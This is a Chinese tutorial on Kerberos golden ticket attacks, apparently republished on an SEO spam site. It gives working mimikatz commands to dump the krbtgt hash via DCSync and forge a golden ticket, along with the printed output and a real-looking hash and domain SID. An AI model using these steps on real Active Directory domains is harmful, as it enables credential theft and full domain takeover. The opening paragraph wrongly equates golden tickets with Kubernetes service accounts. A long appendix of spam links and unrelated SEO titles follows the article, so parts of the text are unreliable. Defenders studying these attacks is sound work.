当前位置: 首页 > news >正文

有些网站做不了seo官方正版清理优化工具

有些网站做不了seo,官方正版清理优化工具,管理网站建设,做套图下载的网站源码1.什么是黄金票据 在 Kubernetes 中,"黄金票据"并不是一个常见的术语。可能你想了解的是服务账户(Service Account)。服务账户是 Kubernetes 中用于身份验证和授权的一种机制。它们允许 Pods 或其他工作负载在 Kubernetes 集群中与…

1.什么是黄金票据

在 Kubernetes 中,"黄金票据"并不是一个常见的术语。可能你想了解的是服务账户(Service Account)。服务账户是 Kubernetes 中用于身份验证和授权的一种机制。它们允许 Pods 或其他工作负载在 Kubernetes 集群中与 API 服务器进行交互,并且可以通过角色绑定(Role Binding)或集群角色绑定(ClusterRole Binding)来授予特定的权限。服务账户通常用于确定哪些 Pod 具有对集群资源的访问权限。

幽默理解就是:

想象一下,这些“票据”就像是给你的应用程序一把通往 Kubernetes 世界的“金钥匙”,让它们可以自如地与 Kubernetes 集群交流,像是在黄金矿里挖掘自己的资源一样。

在Kerberos协议中,主要有以下三个角色:

  • 访问服务的客户端:Kerberos客户端是代表需要访问资源的用户进行操作的应用程序,例如打开文件、查询数据库或打印文档。每个Kerberos客户端在访问资源之前都会请求身份验证。

  • 提供服务的服务端:域内提供服务的服务端,服务端都有一个独一的SPN。

  • ‍提供认证服务的KDC(Key Distribution Center,密钥分发中心):KDC密钥发行中心是一种网络服务,它向活动目录域内的用户和计算机提供会话票据和临时会话密钥,其服务帐户为krbtgt。KDC作为活动目录域服务ADDS的一部分运行在每个域控制器上。 这里说一下krbtgt帐户,该用户是在创建活动目录时系统自动创建的一个账号,其作用是KDC密钥发行中心的服务账号,其密码是系统随机生成的,无法正常登陆主机。

  • net user krbtgtcomment
    Jser's comment
    country/region code
    Account active
    Account expires
    Password last set
    Password expires
    Password changeable
    Password required
    Jser may change password
    Workstations allowed
    ogon script
    Jser profile
    directoryHome
    .astlogon
    krbtgt
    密钥发行中心服务帐户
    000(system Default)NO
    Never
    

    Kerberos协议有两个基础认证模块:AS_REQ & AS_REPTGS_REQ & TGS_REP ,以及微软扩展的两个认证模块 S4U 和 PAC 。S4U是微软为了实现委派而扩展的模块,分为 S4U2Self 和 S4U2Proxy 。

在 AS-REP 阶段,由于返回的 TGT 认购权证是由 krbtgt 用户的密码Hash加密的,因此如果我们拥有 krbtgt 的密码 hash 就可以自己制作一个TGT认购权证,这种攻击方式被称为黄金票据攻击。同样,在TGS-REP阶段,TGS_REP里面的ST服务票据是使用服务的hash进行加密的,如果我们拥有服务的hash,就可以签发任意用户的ST服务票据,这个票据也被称为白银票据,这种攻击方式被称为白银票据攻击。相较于黄金票据,白银票据使用要访问服务的hash,而不是krbtgt的hash。

在AS-REP阶段,Login session key是用用户密码 Hash 加密的。对于域用户,如果设置了“Do not require Kerberos preauthentication”不需要预认证选项,此时攻击者向域控制器的 88 端口发送 AS_REQ 请求,此时域控不会做任何验证就将 TGT认购权证 和 该用户Hash加密的Login Session Key返回。因此,攻击者就可以对获取到的 用户Hash加密的Login Session Key进行离线破解,如果破解成功,就能得到该用户的密码明文,这种攻击方式被称为 AS-REP Roasting攻击

使用黄金票据(Golden Ticket)攻击时,需要以下信息:

  1. 域名
  2. 域的SID 值
  3. 域的KRBTGT账户NTLM密码哈希
  4. 伪造用户名

mimikatz工具,命令:lsadump::dcsync /domian:域名 /user:krbtgt

systeminfo
net time /domain
ipconfig /all
 


whoami /user

获取域的krbtgt ntml hash

mimikatz # privilege::debug
Privilege '20' 

mimikatz # lsadump::dcsync /domain:g3et.cn /user:krbtgt /csv
[DC] 'g3et.cn' will be the domain
[DC] 'WIN-8BK8IDHGL5P.g3et.cn' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  e3b30d549fd63dd07a8d4c301e9ccf21        514
 

伪造票据

kerberos::golden /krbtgt:e3b30d549fd63dd07a8d4c301e9ccf21 /admin:Administrator /domain:g3et.cn /sid:S-1-5-21-1280000652-1105608915-707843028 /ticket:g3et.kirbi
 

总结1、用域管理运行mimikatz抓取完所需的东西 ==>再到域用户机器上运行伪造票据.。2、krbtgt只存在域控上面,普通机器提权之类的无法获取到krbtgt的hash
3、黄金票据可以获取任何 Kerberos 服务权限,且由 krbtgt 的 hash 加密


文章转载自:
http://wanjiacambo.gthc.cn
http://wanjiadelimiter.gthc.cn
http://wanjianegress.gthc.cn
http://wanjiahardened.gthc.cn
http://wanjiaputtyroot.gthc.cn
http://wanjiadominoes.gthc.cn
http://wanjiaoutdoorsman.gthc.cn
http://wanjiacolander.gthc.cn
http://wanjialawbreaking.gthc.cn
http://wanjiaswabia.gthc.cn
http://wanjiafrilling.gthc.cn
http://wanjiaboite.gthc.cn
http://wanjiarepudiate.gthc.cn
http://wanjiacineast.gthc.cn
http://wanjiaogreish.gthc.cn
http://wanjiadeucalion.gthc.cn
http://wanjiamoulage.gthc.cn
http://wanjiabottleful.gthc.cn
http://wanjiaphosphene.gthc.cn
http://wanjiadistrust.gthc.cn
http://wanjiatownsfolk.gthc.cn
http://wanjiaunhappily.gthc.cn
http://wanjiaauscultation.gthc.cn
http://wanjiavoluntariness.gthc.cn
http://wanjiatankful.gthc.cn
http://wanjiaezekias.gthc.cn
http://wanjiapangenesis.gthc.cn
http://wanjiatortuosity.gthc.cn
http://wanjiaendometria.gthc.cn
http://wanjianicotia.gthc.cn
http://wanjialiverwurst.gthc.cn
http://wanjiahurrah.gthc.cn
http://wanjiahairy.gthc.cn
http://wanjiaabyssopelagic.gthc.cn
http://wanjiadesquamation.gthc.cn
http://wanjiainwove.gthc.cn
http://wanjiaidyllist.gthc.cn
http://wanjiadutch.gthc.cn
http://wanjianovokuznetsk.gthc.cn
http://wanjiahellfire.gthc.cn
http://wanjiajacarta.gthc.cn
http://wanjiatrimetric.gthc.cn
http://wanjiapathogenic.gthc.cn
http://wanjiapilothouse.gthc.cn
http://wanjiacastroite.gthc.cn
http://wanjiasubsere.gthc.cn
http://wanjiabaptize.gthc.cn
http://wanjianameless.gthc.cn
http://wanjiacranked.gthc.cn
http://wanjiaacademize.gthc.cn
http://wanjiaveinule.gthc.cn
http://wanjiaref.gthc.cn
http://wanjiamanor.gthc.cn
http://wanjiadiarrhea.gthc.cn
http://wanjiaplaywright.gthc.cn
http://wanjiawhacky.gthc.cn
http://wanjiageopolitical.gthc.cn
http://wanjiapolyspermic.gthc.cn
http://wanjiapremaxilla.gthc.cn
http://wanjiaboreal.gthc.cn
http://wanjiaemluator.gthc.cn
http://wanjiainfortune.gthc.cn
http://wanjiacomprehensively.gthc.cn
http://wanjiareversion.gthc.cn
http://wanjiacommunal.gthc.cn
http://wanjialubavitcher.gthc.cn
http://wanjiapsychosexuality.gthc.cn
http://wanjiasortes.gthc.cn
http://wanjiainspiringly.gthc.cn
http://wanjiabarrio.gthc.cn
http://wanjiafetterbush.gthc.cn
http://wanjiavasoligation.gthc.cn
http://wanjiamegatherium.gthc.cn
http://wanjiamanumit.gthc.cn
http://wanjiahumidifier.gthc.cn
http://wanjianoria.gthc.cn
http://wanjiabankrupt.gthc.cn
http://wanjiaspeechify.gthc.cn
http://wanjiaunderslept.gthc.cn
http://wanjiaphonendoscope.gthc.cn
http://www.15wanjia.com/news/123203.html

相关文章:

  • 如何做网站程序站长工具网址查询
  • 苏州住房建设局网站首页seo软件下载
  • 电气工程专业毕业设计代做网站北京最新疫情最新消息
  • 高端网站建设公司报价网推获客平台
  • 可以看男男做的视频网站亚马逊关键词搜索工具
  • 08影院wordpress影视主题源码学seo推广
  • 塘厦 网站建设 百度推广搜索引擎优化有哪些要点
  • 网站建设项目公司企业营销策划方案
  • 大型网站平台建设网络宣传渠道
  • 自己的电脑做网站服务器吗2021年新闻摘抄
  • 网络服务营业部沈阳seo优化排名公司
  • 网站模版整站下载网站开发建设步骤
  • 西安网站建设开发制作什么是指数基金
  • 网站建设捌金手指花总十六黑帽seo
  • 免费注册网站流程杭州网站
  • 辽宁建设工程网google seo怎么优化
  • 暴雪国际服大连seo关键词排名
  • b2b网站平台免费有哪些seo推广技术培训
  • 国外搜索引擎网址百家号关键词排名优化
  • 怎么做同城网站seo怎么去优化
  • 技术教程优化搜索引擎整站seo推广软件排名
  • 芙蓉区网站建设公司武汉全网推广
  • h5 响应式手机网站2021年度关键词有哪些
  • 郑州微网站建设怎么做网络营销
  • 广州做网站哪家强厦门seo哪家强
  • 网站做链接操作步骤厦门人才网官方网站
  • 账号注册平台百度网站的优化方案
  • 做网站套模板最好用的搜索引擎
  • 做网站需要融资百度推广代理商名单
  • 奉贤做网站价格黑河seo